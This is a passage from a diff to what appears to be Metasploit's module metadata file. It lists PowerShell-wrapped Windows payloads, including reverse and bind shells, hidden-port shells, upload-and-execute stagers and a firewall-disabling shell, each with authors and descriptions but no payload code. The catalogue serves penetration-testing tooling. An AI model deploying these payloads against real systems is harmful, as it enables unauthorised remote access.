"path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/shell/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/shell/reverse_udp": { + "name": "Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/shell/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "spoonm ", + "sf ", + "RageLtMan " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell/reverse_udp", + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_udp" + }, + "payload_cmd/windows/powershell/shell_bind_tcp": { + "name": "Powershell Exec, Windows Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/shell_bind_tcp_xpfw": { + "name": "Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_bind_tcp_xpfw", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Lin0xx " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nDisable the Windows ICF, then listen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_bind_tcp_xpfw", + "staged": false + }, + "payload_cmd/windows/powershell/shell_hidden_bind_tcp": { + "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_hidden_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sd", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_hidden_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/shell_reverse_tcp": { + "name": "Powershell Exec, Windows Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/speak_pwned": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/speak_pwned", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Berend-Jan \"SkyLined\" Wever " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/speak_pwned", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/speak_pwned", + "staged": false + }, + "payload_cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_hidden_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/upexec/bind_named_pipe": { + "name": "Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/upexec/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_named_pipe", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/upexec/bind_nonx_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_tcp_rc4": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/upexec/bind_tcp_uuid": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/upexec/find_tag": { + "name": "Powershell Exec, Windows Upload/Execute, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/upexec/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/find_tag", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/upexec/reverse_ipv6_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_nonx_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_ord_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_allports": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_dns": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": 